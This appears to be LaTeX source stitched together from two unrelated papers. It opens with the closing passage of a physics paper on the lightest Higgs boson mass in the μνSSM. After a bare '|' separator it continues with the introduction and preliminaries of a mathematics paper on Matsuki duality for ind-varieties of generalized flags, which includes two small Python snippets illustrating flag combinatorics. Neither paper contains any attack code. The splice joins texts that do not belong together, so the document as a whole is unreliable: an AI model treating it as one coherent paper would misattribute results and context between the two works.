Eq.~(\ref{mh-app1}) is also consistent with the exact result.
\begin{figure}
\setlength{\unitlength}{1mm}
\centering
\begin{minipage}[c]{0.45\textwidth}
\includegraphics[width=2.9in]{fig2k-a.eps}
\end{minipage}%
\begin{minipage}[c]{0.45\textwidth}
\includegraphics[width=2.9in]{fig2k-b.eps}
\end{minipage}
\caption[]{(a) $m_h$ versus $\kappa$: the solid and dash-dot lines denote $m_h$ and $m_{H_1}$ for $\tan\beta=20$, while the dash and dot lines denote $m_h$ and $m_{H_1}$ for $\tan\beta=6$. (b) $\xi_h$ versus $\kappa$: the solid and dash lines correspond to $\tan\beta=20$ and $\tan\beta=6$, respectively. Here $\lambda=0.1$, $A_\lambda=500\;{\rm GeV}$, and $\upsilon_{\nu^c}=2\;{\rm TeV}$.}
\label{fig2}
\end{figure}
We also plot the lightest Higgs boson mass $m_h$ versus the parameter $\kappa$ in Fig.~\ref{fig2}(a), where the solid and dash-dot lines denote $m_h$ and $m_{H_1}$ for $\tan\beta=20$, while the dash and dot lines denote $m_h$ and $m_{H_1}$ for $\tan\beta=6$. The quantity $\xi_h$ versus $\kappa$ is shown in Fig.~\ref{fig2}(b), where the solid and dash lines correspond to $\tan\beta=20$ and $\tan\beta=6$, respectively. Here, we take $\lambda=0.1$, $A_\lambda=500\;{\rm GeV}$, and $\upsilon_{\nu^c}=2\;{\rm TeV}$. We can see that the lightest Higgs boson mass $m_h$ deviates significantly from $m_{H_1}$ when the parameter $\kappa$ is small; correspondingly, $\xi_h$ is large for small $\kappa$. Constrained by the Landau pole condition~\cite{mnSSM1}, we restrict the parameter to $\kappa\leq0.6$.
\begin{figure}
\setlength{\unitlength}{1mm}
\centering
\begin{minipage}[c]{0.45\textwidth}
\includegraphics[width=2.9in]{fig3A-a.eps}
\end{minipage}%
\begin{minipage}[c]{0.45\textwidth}
\includegraphics[width=2.9in]{fig3A-b.eps}
\end{minipage}
\caption[]{(a) $m_h$ versus $A_\lambda$: the solid and dash-dot lines denote $m_h$ and $m_{H_1}$ for $\tan\beta=20$, while the dash and dot lines denote $m_h$ and $m_{H_1}$ for $\tan\beta=6$. (b) $\xi_h$ versus $A_\lambda$: the solid and dash lines correspond to $\tan\beta=20$ and $\tan\beta=6$, respectively. Here $\kappa=0.4$, $\lambda=0.1$, and $\upsilon_{\nu^c}=2\;{\rm TeV}$.}
\label{fig3}
\end{figure}
In Fig.~\ref{fig3}(a), for $\kappa=0.4$, $\lambda=0.1$, and $\upsilon_{\nu^c}=2\;{\rm TeV}$, we plot the lightest Higgs boson mass $m_h$ versus the parameter $A_\lambda$, where the solid and dash-dot lines denote $m_h$ and $m_{H_1}$ for $\tan\beta=20$, while the dash and dot lines denote $m_h$ and $m_{H_1}$ for $\tan\beta=6$. Fig.~\ref{fig3}(b) shows the quantity $\xi_h$ versus $A_\lambda$, where the solid and dash lines correspond to $\tan\beta=20$ and $\tan\beta=6$, respectively. The numerical results show that $m_h\simeq m_{H_1}$ and $\xi_h\simeq 0$ for $A_\lambda\approx 2\;{\rm TeV}$ at $\tan\beta=6$, and for $A_\lambda\approx 10\;{\rm TeV}$ at $\tan\beta=20$, in accordance with Eq.~(\ref{Alambda}). Compared with the large tree-level contributions, the small one-loop contributions can be neglected, so Eq.~(\ref{Alambda}) reduces to
\begin{eqnarray}
A_\lambda \simeq 2\upsilon_{\nu^c} \Big( \frac{3\lambda}{\sin2\beta} - \kappa \Big) \,.
\label{Alambda1}
\end{eqnarray}
Therefore, when $A_\lambda$ is around $ 2\upsilon_{\nu^c} \Big( {3\lambda}/{\sin2\beta} - \kappa \Big)$, the lightest Higgs boson mass satisfies $m_h \approx m_{H_1}$. If $A_\lambda$ deviates significantly from this value, the lightest Higgs boson mass $m_h$ will deviate from $m_{H_1}$.
\begin{figure}
\setlength{\unitlength}{1mm}
\centering
\begin{minipage}[c]{0.45\textwidth}
\includegraphics[width=2.9in]{fig4vc-a.eps}
\end{minipage}%
\begin{minipage}[c]{0.45\textwidth}
\includegraphics[width=2.9in]{fig4vc-b.eps}
\end{minipage}
\caption[]{(a) $m_h$ versus $\upsilon_{\nu^c}$: the solid and dash-dot lines denote $m_h$ and $m_{H_1}$ for $\tan\beta=20$, while the dash and dot lines denote $m_h$ and $m_{H_1}$ for $\tan\beta=6$. (b) $\xi_h$ versus $\upsilon_{\nu^c}$: the solid and dash lines correspond to $\tan\beta=20$ and $\tan\beta=6$, respectively. Here $\kappa=0.4$, $\lambda=0.1$, and $A_\lambda=500\;{\rm GeV}$.}
\label{fig4}
\end{figure}
Finally, for $\kappa=0.4$, $\lambda=0.1$, and $A_\lambda=500\;{\rm GeV}$, we plot the lightest Higgs boson mass $m_h$ versus the parameter $\upsilon_{\nu^c}$ in Fig.~\ref{fig4}(a), where the solid and dash-dot lines denote $m_h$ and $m_{H_1}$ for $\tan\beta=20$, while the dash and dot lines denote $m_h$ and $m_{H_1}$ for $\tan\beta=6$. Fig.~\ref{fig4}(b) shows $\xi_h$ versus $\upsilon_{\nu^c}$, where the solid and dash lines correspond to $\tan\beta=20$ and $\tan\beta=6$, respectively. We can see that the lightest Higgs boson mass $m_h$ runs parallel to $m_{H_1}$ as $\upsilon_{\nu^c}$ increases. From Eq.~(\ref{mR1}), $m_{R_1}^2 \sim \mathcal{O}(\upsilon_{\nu^c}^2)$, while $A_{X_1}^2 \sim \mathcal{O}(\upsilon_{\nu^c})$ as shown in Eq.~(\ref{AX1}). Therefore, the quantity $\xi_h = \frac{(A_{X_1}^2)^2}{m_{R_1}^2 m_{H_1}^2}$ defined in Eq.~(\ref{xih}) flattens out as $\upsilon_{\nu^c}$ increases, as seen in Fig.~\ref{fig4}(b). In addition, Fig.~\ref{fig4}(a) indicates that $m_h$ and $m_{H_1}$ decrease slowly as $\upsilon_{\nu^c}$ increases, because the parameter $\mu=3\lambda\upsilon_{\nu^c}$ grows and affects the radiative corrections to the lightest Higgs boson mass.
\section{Summary\label{sec-sum}}
\indent
In the framework of the $\mu\nu$SSM, three singlet right-handed neutrino superfields $\hat{\nu}_i^c$ are introduced to solve the $\mu$ problem of the MSSM. Correspondingly, the right-handed sneutrino VEVs lead to the mixing of the neutral components of the Higgs doublets with the sneutrinos, producing an enlarged CP-even neutral scalar mass matrix; this mixing therefore affects the lightest Higgs boson mass. In this work, we include the radiative corrections to the Higgs boson mass via effective potential methods and then analytically diagonalize the CP-even neutral scalar mass matrix. In the large $m_A$ limit, we give an approximate expression for the lightest Higgs boson mass in Eq.~(\ref{mh-app}). In the numerical analysis, we study how the key parameters $\lambda,\,\tan\beta,\,\kappa,\,A_\lambda$, and $\upsilon_{\nu^c}$ affect the lightest Higgs boson mass.
\begin{acknowledgments}
\indent
The work has been supported by the National Natural Science Foundation of China (NNSFC)
with Grants No. 11535002, No. 11605037 and No. 11647120,
Natural Science Foundation of Hebei province with Grants No. A2016201010 and No. A2016201069,
Foundation of Department of Education of Liaoning province with Grant No. 2016TSPY10,
Youth Foundation of the University of Science and Technology Liaoning with Grant No. 2016QN11,
Hebei Key Lab of Optic-Electronic Information and Materials,
and the Midwest Universities Comprehensive Strength Promotion project.
\end{acknowledgments}
|
\label{S.intro}
In this paper we extend Matsuki duality to ind-varieties of maximal generalized flags, i.e., to homogeneous ind-spaces of the form $\mathbf{G}/\mathbf{B}$ for $\mathbf{G}=\mathrm{GL}(\infty)$, $\mathrm{SL}(\infty)$, $\mathrm{SO}(\infty)$, $\mathrm{Sp}(\infty)$. In the case of a finite-dimensional reductive algebraic group $G$, Matsuki duality \cite{Gindikin-Matsuki, Matsuki, Matsuki3} is a bijection between the (finite) set of $K$-orbits on $G/B$ and the set of $G^0$-orbits on $G/B$, where $K$ is a symmetric subgroup of $G$ and $G^0$ is a real form of $G$. Moreover, this bijection reverses the inclusion relation between orbit closures. In particular, the remarkable theorem about the uniqueness of a closed $G^0$-orbit on $G/B$, see \cite{W1}, follows via Matsuki duality from the uniqueness of a (Zariski) open $K$-orbit on $G/B$.
In the monograph \cite{FHW}, Matsuki duality has been used as the starting point in a study of cycle spaces.
If $\mathbf{G}=\mathrm{GL}(\infty)$, $\mathrm{SL}(\infty)$, $\mathrm{SO}(\infty)$, $\mathrm{Sp}(\infty)$ is a classical ind-group, then its Borel ind-subgroups are neither $\mathbf{G}$-conjugate nor $\mathrm{Aut}(\mathbf{G})$-conjugate, hence there are many ind-varieties of the form $\mathbf{G}/\mathbf{B}$. We show that Matsuki duality extends to any ind-variety $\mathbf{G}/\mathbf{B}$ where $\mathbf{B}$ is a splitting Borel ind-subgroup of $\mathbf{G}$ for $\mathbf{G}=\mathrm{GL}(\infty)$, $\mathrm{SL}(\infty)$, $\mathrm{SO}(\infty)$, $\mathrm{Sp}(\infty)$. In the infinite-dimensional case, the structure of $\mathbf{G}^0$-orbits and $\mathbf{K}$-orbits on $\mathbf{G}/\mathbf{B}$ is more complicated than in the finite-dimensional case, and there are always infinitely many orbits.
A first study of the $\mathbf{G}^0$-orbits on $\mathbf{G}/\mathbf{B}$ for $\mathbf{G}=\mathrm{GL}(\infty),\mathrm{SL}(\infty)$ was done in~\cite{Ignatyev-Penkov-Wolf} and was continued in~\cite{W}. In particular, in \cite{Ignatyev-Penkov-Wolf} it was shown that, for some real forms $\mathbf{G}^0$, there are splitting Borel ind-subgroups $\mathbf{B}\subset \mathbf{G}$ such that $\mathbf{G}/\mathbf{B}$ has neither an open nor a closed $\mathbf{G}^0$-orbit.
We know of no prior studies of the structure of $\mathbf{K}$-orbits on $\mathbf{G}/\mathbf{B}$ for $\mathbf{G}=\mathrm{GL}(\infty),\mathrm{SL}(\infty),\mathrm{SO}(\infty),\mathrm{Sp}(\infty)$. The duality we establish in this paper shows that the structure of $\mathbf{K}$-orbits on $\mathbf{G}/\mathbf{B}$ is a ``mirror image'' of the structure of $\mathbf{G}^0$-orbits on $\mathbf{G}/\mathbf{B}$. In particular, the fact that $\mathbf{G}/\mathbf{B}$ admits at most one closed $\mathbf{G}^0$-orbit is now a corollary of the obvious statement that $\mathbf{G}/\mathbf{B}$ admits at most one Zariski-open $\mathbf{K}$-orbit.
Our main result can be stated as follows.
Let $(\mathbf{G},\mathbf{K},\mathbf{G}^0)$ be one of the triples
listed in Section \ref{S2.1}
consisting of
a classical (complex) ind-group $\mathbf{G}$, a symmetric ind-subgroup $\mathbf{K}\subset\mathbf{G}$,
and the corresponding real form $\mathbf{G}^0\subset\mathbf{G}$.
Let $\mathbf{B}\subset\mathbf{G}$ be a splitting Borel ind-subgroup
such that $\mathbf{X}:=\mathbf{G}/\mathbf{B}$ is
an ind-variety of maximal generalized flags (isotropic, in types B, C, D)
weakly compatible with a basis adapted to
the choice of $\mathbf{K}$, $\mathbf{G}^0$ in the sense of Sections \ref{S2.1}, \ref{S2.3}.
There are natural exhaustions $\mathbf{G}=\bigcup_{n\geq 1}G_n$
and $\mathbf{X}=\bigcup_{n\geq 1}X_n$.
Here $G_n$ is a finite-dimensional algebraic group,
$X_n$ is the full flag variety of $G_n$,
and the inclusion $X_n\subset\mathbf{X}$ is in particular $G_n$-equivariant.
Moreover $K_n:=\mathbf{K}\cap G_n$ and $G^0_n:=\mathbf{G}^0\cap G_n$
are respectively a symmetric subgroup and the corresponding real form of $G_n$.
See Section \ref{S4.4} for more details.
\begin{theorem}
\label{theorem-1}
\begin{itemize}
\item[\rm (a)] For every $n\geq 1$ the inclusion $X_n\subset \mathbf{X}$
induces embeddings of orbit sets $X_n/K_n\hookrightarrow \mathbf{X}/\mathbf{K}$
and $X_n/G^0_n\hookrightarrow \mathbf{X}/\mathbf{G}^0$.
\item[\rm (b)] There is a bijection $\Xi:\mathbf{X}/\mathbf{K}\to\mathbf{X}/\mathbf{G}^0$
such that the diagram
\[
\xymatrix{
X_n/K_n \ar@{->}[d]^{\Xi_n} \ar@{^{(}->}[r] & \mathbf{X}/\mathbf{K} \ar@{->}[d]^{\Xi} \\
X_n/G^0_n \ar@{^{(}->}[r] & \mathbf{X}/\mathbf{G}^0
}
\]
is commutative, where $\Xi_n$ stands for Matsuki duality.
\item[\rm (c)] For every $\mathbf{K}$-orbit $\bs{\mathcal{O}}\subset\mathbf{X}$
the intersection $\bs{\mathcal{O}}\cap\Xi(\bs{\mathcal{O}})$ consists of a single $\mathbf{K}\cap\mathbf{G}^0$-orbit.
\item[\rm (d)] The bijection $\Xi$ reverses the inclusion relation of orbit closures.
In particular $\Xi$ maps open (resp., closed) $\mathbf{K}$-orbits to
closed (resp., open) $\mathbf{G}^0$-orbits.
\end{itemize}
\end{theorem}
Actually our results are much more precise: in Propositions \ref{P4-1.1}, \ref{P4.2-2}, \ref{P4.3} we show that $\mathbf{X}/\mathbf{K}$ and $\mathbf{X}/\mathbf{G}^0$ admit the same explicit parametrization which is nothing but the inductive limit of suitable joint parametrizations of $X_n/K_n$ and $X_n/G_n^0$. This yields the bijection $\Xi$ of Theorem \ref{theorem-1}\,{\rm (b)}. Parts {\rm (a)} and {\rm (b)} of Theorem \ref{theorem-1} are
implied by our claims (\ref{T-proof.1}), (\ref{T-proof.2}), (\ref{T-proof.3}) below. Theorem \ref{theorem-1}\,{\rm (c)} follows from the corresponding statements in Propositions \ref{P4-1.1}, \ref{P4.2-2}, \ref{P4.3}.
Finally, Theorem \ref{theorem-1}\,{\rm (d)} is implied by
Theorem \ref{theorem-1}\,{\rm (a)}--{\rm (b)}, the definition of the ind-topology,
and the fact that the duality $\Xi_n$ reverses the inclusion relation between orbit closures.
\subsection*{Organization of the paper}
In Section \ref{S2} we introduce the notation for classical ind-groups, symmetric ind-subgroups, and real forms.
We recall some basic facts on finite-dimensional flag varieties, as well as the notion of ind-variety of generalized flags \cite{Dimitrov-Penkov,Ignatyev-Penkov}.
In Section \ref{S3} we give
the joint parametrization of $K$- and $G^0$-orbits in a finite-dimensional flag variety.
This parametrization should be known in principle (see \cite{MO,Y})
but we have not found a reference where it would appear exactly as we present it. For the sake of completeness we provide full proofs of these results.
In
Section \ref{S4} we state our main results on the parametrization of $\mathbf{K}$- and $\mathbf{G}^0$-orbits in ind-varieties of generalized flags. Theorem \ref{theorem-1} above is a consequence of these results.
In Section \ref{S5} we point out some further corollaries of our main results.
In what follows $\mathbb{N}^*$ stands for the set of positive integers.
$|A|$ stands for the cardinality of a set $A$. The symmetric group on $n$ letters is denoted by $\mathfrak{S}_n$ and $\mathfrak{S}_\infty=\lim\limits_{\longrightarrow}\,\mathfrak{S}_n$ stands for the infinite symmetric group.
Often we write $w_k$ for the image $w(k)$ of $k$ under a permutation $w$.
By $(k;\ell)$ we denote the transposition that switches $k$ and $\ell$.
We use boldface letters to denote ind-varieties.
An index of notation can be found at the end of the paper.
\subsection*{Acknowledgement}
We thank Alan Huckleberry and Mikhail Ignatyev for their encouragement to study Matsuki duality. The first author was supported in part by ISF Grant Nr. 797/14 and by ANR project GeoLie (ANR-15-CE40-0012). The second author was supported in part by DFG Grant PE 980/6-1.
\section{Notation and preliminary facts}
\label{S2}
\subsection{Classical groups and classical ind-groups}
\label{S2.1}
Let $\mathbf{V}$ be a complex vector space of countable dimension, with a basis
$E=(e_1,e_2,\ldots)=(e_\ell)_{\ell\in \mathbb{N}^*}$.
Every vector $x\in\mathbf{V}$ is identified with the column of its coordinates in the basis $E$,
and $x\mapsto \overline{x}$ stands for complex conjugation with respect to $E$.
We also consider the finite-dimensional subspace $V=V_n:=\langle e_1,\ldots,e_n\rangle_\mathbb{C}$ of $\mathbf{V}$.
The classical ind-group $\mathrm{GL}(\infty)$ is defined as
\[\mathrm{GL}(\infty)=\mathbf{G}(E):=\{g\in\mathrm{Aut}(\mathbf{V}):g(e_\ell)=e_\ell\mbox{ for all $\ell\gg 1$}\}=\bigcup_{n\geq 1}\mathrm{GL}(V_n).\]
The real forms of $\mathrm{GL}(\infty)$ are well known and can be traced back to the work of Baranov~\cite{Baranov}. Below we list aligned pairs $(\mathbf{K},\mathbf{G}^0)$, where $\mathbf{G}^0$ is a real form of $\mathbf{G}$ and $\mathbf{K}\subset\mathbf{G}$ is a symmetric ind-subgroup of $\mathbf{G}$. The pairs $\left(\mathbf{K},\mathbf{G}^0\right)$ we consider are aligned in the following way: there exists an exhaustion of $\mathbf{G}$ as a union $\bigcup_n\,\mathrm{GL}\left(V_n\right)$ such that $K_n:=\mathbf{K}\cap\mathrm{GL}\left(V_n\right)$ is a symmetric subgroup of $\mathrm{GL}\left(V_n\right)$, $G_n^0:=\mathbf{G}^0\cap\mathrm{GL}\left(V_n\right)$ is a real form of $\mathrm{GL}\left(V_n\right)$, and $K_n\cap G_n^0$ is a maximal compact subgroup of $G_n^0$.
\subsubsection{Types A1 and A2}
\label{S:A1A2}
Let $\Omega$ be an $\mathbb{N}^*\times\mathbb{N}^*$-matrix of the form
\begin{equation}
\label{omega}
\Omega=\left(
\begin{array}{cccc}
J_1 & & (0) \\
& J_2 \\
(0) & & \ddots
\end{array}
\right)\
\mbox{where}\
\left\{
\begin{array}{ll}
J_k\in\left\{\left(\begin{matrix} 0 & 1 \\ 1 & 0 \end{matrix}\right),\left(1\right)\right\}
& \parbox{2.6cm}{(orthogonal case, \\ type A1),} \\[4mm]
J_k=\left(\begin{matrix} 0 & 1 \\ -1 & 0 \end{matrix}\right) & \parbox{2.6cm}{(symplectic case, \\ type A2).}
\end{array}
\right.
\end{equation}
The bilinear form
\[\omega(x,y):={}^tx\Omega y\quad (x,y\in \mathbf{V})\]
is symmetric in type A1 and symplectic in type A2, whereas the map
\[\gamma(x):=\Omega\overline{x}\quad (x\in \mathbf{V})\]
is an involution of $\mathbf{V}$ in type A1 and an antiinvolution in type A2.
Let
\begin{eqnarray*}
& & \mathbf{K}=\mathbf{G}(E,\omega):=\{g\in \mathbf{G}(E):\omega(gx,gy)=\omega(x,y)\ \forall x,y\in\mathbf{V}\} \\[1mm]
& \mbox{and} & \mathbf{G}^0:=\{g\in \mathbf{G}(E):\gamma(gx)=g\gamma(x)\ \forall x\in\mathbf{V}\}.
\end{eqnarray*}
\subsubsection{Type A3}
\label{S:A3}
Fix a (proper) decomposition $\mathbb{N}^*=N_+\sqcup N_-$ and let
\begin{equation}
\label{phi}
\Phi=\left(
\begin{array}{cccc}
\epsilon_1 & & (0) \\
& \epsilon_2 \\
(0) & & \ddots
\end{array}
\right)
\end{equation}
where $\epsilon_\ell=1$ for $\ell\in N_+$ and $\epsilon_\ell=-1$ for $\ell\in N_-$.
Thus
\[\phi(x,y):={}^t\overline{x} \Phi y\quad(x,y\in\mathbf{V})\]
is a Hermitian form of signature $(|N_+|,|N_-|)$ and
\[\delta(x):=\Phi x\quad(x\in\mathbf{V})\]
is an involution. Finally let
\[
\mathbf{K}:=\{g\in \mathbf{G}(E):\delta(gx)=g\delta(x)\ \forall
x\in\mathbf{V}\}
\]
and
\[
\mathbf{G}^0:=\{g\in \mathbf{G}(E):\phi(gx,gy)=\phi(x,y)\ \forall
x,y\in\mathbf{V}\}.
\]
\subsection*{Types B, C, D}
Next we describe pairs $(\mathbf{K},\mathbf{G}^0)$ associated to
the other classical ind-groups $\mathrm{SO}(\infty)$ and $\mathrm{Sp}(\infty)$. Let $\mathbf{G}=\mathbf{G}(E,\omega)$
where $\omega$ is a (symmetric or symplectic) bilinear form given by a matrix $\Omega$ as in (\ref{omega}).
In view of (\ref{omega}), for every $\ell\in\mathbb{N}^*$ there is a unique $\ell^*\in\mathbb{N}^*$ such that
\[\omega(e_\ell,e_{\ell^*})\not=0.\]
Moreover $\ell^*\in\{\ell-1,\ell,\ell+1\}$. The map $\ell\mapsto\ell^*$ is an involution of $\mathbb{N}^*$.
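As a concrete illustration of the involution $\ell\mapsto\ell^*$, the sketch below computes it from the sizes of the diagonal blocks $J_k$ of $\Omega$. The function name and the encoding of $\Omega$ by a list of block sizes are ours, introduced only for this example.

```python
def star_involution(block_sizes):
    """Compute the involution l -> l* determined by a block-diagonal
    matrix Omega whose diagonal blocks J_k have the given sizes (1 or 2):
    inside a 2x2 block the two indices are swapped, while a 1x1 block
    gives a fixed point; hence l* always lies in {l-1, l, l+1}."""
    star, l = {}, 1
    for size in block_sizes:
        if size == 1:
            star[l] = l                        # omega(e_l, e_l) != 0
        else:
            star[l], star[l + 1] = l + 1, l    # omega(e_l, e_{l+1}) != 0
        l += size
    return star
```

For instance, blocks of sizes $2,1,2$ give $1^*=2$, $2^*=1$, $3^*=3$, $4^*=5$, $5^*=4$, and indeed $(\ell^*)^*=\ell$ for all $\ell$.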
\subsubsection{Types BD1 and C2}
\label{S:BD1C2}
Assume that $\omega$ is symmetric in type BD1 and symplectic in type C2.
Fix a (proper) decomposition $\mathbb{N}^*=N_+\sqcup N_-$ such that
\[\forall \ell\in\mathbb{N}^*,\ \ell\in N_+\Leftrightarrow \ell^*\in N_+\]
and the restriction of $\omega$ to each of the subspaces $\mathbf{V}_+:=\langle e_\ell:\ell\in N_+\rangle_\mathbb{C}$ and
$\mathbf{V}_-:=\langle e_\ell:\ell\in N_-\rangle_\mathbb{C}$ is nondegenerate.
Let $\Phi,\phi,\delta$ be as in Section~\ref{S:A3}. Then we set
\begin{eqnarray}
\label{N1}
\mathbf{K}:=\{g\in \mathbf{G}(E,\omega):\delta(gx)=g\delta(x)\ \forall
x\in\mathbf{V}\}
\end{eqnarray}
and
\begin{eqnarray}
\label{N2}
\mathbf{G}^0:=\{g\in \mathbf{G}(E,\omega):\phi(gx,gy)=\phi(x,y)\ \forall
x,y\in\mathbf{V}\}.
\end{eqnarray}
\subsubsection{Types C1 and D3}
\label{S:C1D3}
Assume that $\omega$ is symmetric in type D3 and symplectic in type C1.
Fix a decomposition $\mathbb{N}^*=N_+\sqcup N_-$ satisfying
\[
\forall \ell\in\mathbb{N}^*,\ \ell\in N_+\Leftrightarrow \ell^*\in N_-.
\]
Note that this forces every block $J_k$ in (\ref{omega}) to be of size $2$.
In this situation $\mathbf{V}_+:=\langle e_\ell:\ell\in N_+\rangle_\mathbb{C}$ and $\mathbf{V}_-:=\langle e_\ell:\ell\in N_-\rangle_\mathbb{C}$
are maximal isotropic subspaces for the form $\omega$.
Let $\Phi,\phi,\delta$ be as in Section~\ref{S:A3}. Finally, we define the ind-subgroups $\mathbf{K},\mathbf{G}^0\subset\mathbf{G}$ as in (\ref{N1}), (\ref{N2}).
\subsection*{Finite-dimensional case}
The following table summarizes the form of the intersections $G=\mathbf{G}\cap\mathrm{GL}\left(V_n\right)$, $K=\mathbf{K}\cap\mathrm{GL}\left(V_n\right)$, $G^0=\mathbf{G}^0\cap\mathrm{GL}\left(V_n\right)$, where $n=2m$ is even whenever we are in types A2, C1, C2, and D3.
In types A3, BD1, and C2, we set $(p,q)=(|N_+\cap\{1,\ldots,n\}|,|N_-\cap\{1,\ldots,n\}|)$.
By $\mathbb{H}$ we denote the skew field of quaternions.
In this way we retrieve the classical finite-dimensional symmetric pairs and real forms
(see, e.g., \cite{Berger,OV,Otha1}).
\begin{center}
\renewcommand{\arraystretch}{1.25}
\begin{tabular}{|c|c|c|c|}
\hline
type & $G:=\mathbf{G}\cap\mathrm{GL}\left(V_n\right)$ & $K:=\mathbf{K}\cap\mathrm{GL}\left(V_n\right)$ & $G^0:=\mathbf{G}^0\cap\mathrm{GL}\left(V_n\right)$ \\
\hline
A1 & & $\mathrm{O}_n(\mathbb{C})$ & $\mathrm{GL}_n(\mathbb{R})$ \\
A2 & $\mathrm{GL}_n(\mathbb{C})$ & $\mathrm{Sp}_n(\mathbb{C})$ & $\mathrm{GL}_m(\mathbb{H})$ \\
A3 & & $\mathrm{GL}_p(\mathbb{C})\times\mathrm{GL}_q(\mathbb{C})$ & $\mathrm{U}_{p,q}(\mathbb{C})$ \\
\hline
BD1 & $\mathrm{O}_n(\mathbb{C})$ & $\mathrm{O}_p(\mathbb{C})\times\mathrm{O}_q(\mathbb{C})$ & $\mathrm{O}_{p,q}(\mathbb{C})$ \\
\hline
C1 & $\mathrm{Sp}_n(\mathbb{C})$ & $\mathrm{GL}_m(\mathbb{C})$ & $\mathrm{Sp}_n(\mathbb{R})$ \\
C2 & & $\mathrm{Sp}_p(\mathbb{C})\times\mathrm{Sp}_q(\mathbb{C})$ & $\mathrm{Sp}_{p,q}(\mathbb{C})$ \\
\hline
D3 & $\mathrm{O}_n(\mathbb{C})=\mathrm{O}_{2m}(\mathbb{C})$ & $\mathrm{GL}_m(\mathbb{C})$ & $\mathrm{O}^*_n(\mathbb{C})$ \\
\hline
\end{tabular}
\end{center}
In each case $G^0$ is a real form obtained from $K$ so that $K\cap G^0$ is a maximal compact subgroup of $G^0$.
Conversely $K$ is obtained from $G^0$ as the complexification of a maximal compact subgroup.
\subsection{Finite-dimensional flag varieties}
\label{S2.2}
Recall that $V=V_n$.
The flag variety $X:=\mathrm{GL}(V)/B=\{gB:g\in \mathrm{GL}(V)\}$ (for a Borel subgroup $B\subset \mathrm{GL}(V)$)
can as well be viewed as the set of Borel subgroups $\{gBg^{-1}:g\in \mathrm{GL}(V)\}$
or as the set of complete flags
\begin{equation}
\label{2.2.X}
\big\{\mathcal{F}=(F_0\subset F_1\subset\ldots\subset F_n=V): \dim F_k=k\ \mbox{ for all $k$}\big\}.
\end{equation}
For every complete flag $\mathcal{F}$ let $B_\mathcal{F}:=\{g\in \mathrm{GL}(V):g\mathcal{F}=\mathcal{F}\}$ denote the corresponding Borel subgroup.
When $(v_1,\ldots,v_n)$ is a basis of $V$ we write
\[\mathcal{F}(v_1,\ldots,v_n):=\big(0\subset\langle v_1\rangle_\mathbb{C}\subset\langle v_1,v_2\rangle_\mathbb{C}\subset\ldots\subset\langle v_1,\ldots,v_n\rangle_\mathbb{C}\big)\in X.\]
\medskip
\paragraph{{\bf Bruhat decomposition}}
The double flag variety $X\times X$ has a finite number
of $\mathrm{GL}(V)$-orbits parametrized by permutations $w\in\mathfrak{S}_n$.
Specifically, given two flags $\mathcal{F}=(F_k)_{k=0}^n$ and
$\mathcal{F}'=(F'_\ell)_{\ell=0}^n$ there is a unique permutation
$w=:w(\mathcal{F},\mathcal{F}')$ such that
\[\dim F_k\cap F'_\ell=\big|\big\{j\in\{1,\ldots,\ell\}:w_j\in\{1,\ldots,k\}\big\}\big|.\]
The permutation $w(\mathcal{F},\mathcal{F}')$ is called the relative position of $(\mathcal{F},\mathcal{F}')\in X\times X$.
Then
\[X\times X=\bigsqcup_{w\in\mathfrak{S}_n}\mathbb{O}_w
\quad\mbox{where $\mathbb{O}_w:=\big\{(\mathcal{F},\mathcal{F}')\in X\times X:w(\mathcal{F},\mathcal{F}')=w\big\}$}\]
is the decomposition of $X\times X$ into $\mathrm{GL}(V)$-orbits.
The unique closed orbit is $\mathbb{O}_{\mathrm{id}}$ and the unique open
orbit is $\mathbb{O}_{w_0}$ where $w_0$ is the involution given by
$w_0(k)=n-k+1$ for all $k$. The map
$\mathbb{O}_w\mapsto\mathbb{O}_{w_0w}$ is an involution on the set
of orbits and reverses inclusions between orbit closures.
Representatives of $\mathbb{O}_w$ can be obtained as follows:
for every basis $(v_1,\ldots,v_n)$ of $V$ we have
\[\big(\mathcal{F}(v_1,\ldots,v_n),\mathcal{F}(v_{w_1},\ldots,v_{w_n})\big)\in\mathbb{O}_w.\]
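The relative position $w(\mathcal{F},\mathcal{F}')$ can be recovered mechanically from the table of intersection dimensions by inclusion-exclusion: $w_\ell=k$ exactly when $\dim F_k\cap F'_\ell-\dim F_{k-1}\cap F'_\ell-\dim F_k\cap F'_{\ell-1}+\dim F_{k-1}\cap F'_{\ell-1}=1$. The sketch below does this for flags spanned by subsets of one common basis, so that intersection dimensions are cardinalities of index-set intersections; the function names and input encoding are ours, for illustration only.

```python
def relative_position(flag1, flag2):
    """Recover the permutation w = w(F, F') from intersection dimensions.
    Each flag is a list of index sets: flag[k] is the set of basis indices
    spanning the k-th step, so dim F_k cap F'_l = |flag1[k] & flag2[l]|.
    Then w_l = k exactly where the dimension table jumps at (k, l)."""
    n = len(flag1) - 1
    d = [[len(flag1[k] & flag2[l]) for l in range(n + 1)]
         for k in range(n + 1)]
    w = [0] * (n + 1)
    for l in range(1, n + 1):
        for k in range(1, n + 1):
            if d[k][l] - d[k - 1][l] - d[k][l - 1] + d[k - 1][l - 1] == 1:
                w[l] = k
    return w[1:]

def prefixes(order):
    """The complete flag F(v_{order[0]}, ..., v_{order[n-1]}) as index sets."""
    return [set(order[:i]) for i in range(len(order) + 1)]
```

In accordance with the representatives given above, `relative_position(prefixes([1, 2, 3, 4]), prefixes([2, 4, 1, 3]))` returns `[2, 4, 1, 3]`.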
\medskip
\paragraph{{\bf Variety of isotropic flags}} Let $V$ be endowed with a nondegenerate symmetric or symplectic bilinear form $\omega$.
For a subspace $F\subset V$, set $F^\perp=\{x\in V:\omega(x,y)=0\ \forall y\in F\}$.
The variety of isotropic flags is the subvariety $X_\omega$ of $X$, where
\begin{equation}
\label{2.2.Xomega}
X_\omega=\{\mathcal{F}=(F_k)_{k=0}^n\in X:F_k^\perp=F_{n-k}\ \forall k=0,\ldots,n\}.
\end{equation}
It is endowed with a transitive action of the subgroup
$G(V,\omega)\subset\mathrm{GL}(V)$ of automorphisms preserving $\omega$.
\begin{lemma}
\label{lemma-2.2.1}
{\rm (a)}
For every endomorphism $f\in\mathrm{End}(V)$, let $f^*\in\mathrm{End}(V)$ denote the endomorphism adjoint to $f$ with respect to $\omega$.
Let $H\subset \mathrm{GL}(V)$ be a subgroup satisfying the condition
\begin{equation}
\label{2.2.1}
\mathbb{C}[g^*g]\cap\mathrm{GL}(V)\subset H\ \mbox{ for all $g\in H$}.
\end{equation}
Assume that $\mathcal{F}\in X_\omega$ and $\mathcal{F}'\in X_\omega$ belong to the same $H$-orbit of $X$. Then they belong to the same $H\cap G(V,\omega)$-orbit of $X_\omega$. \\
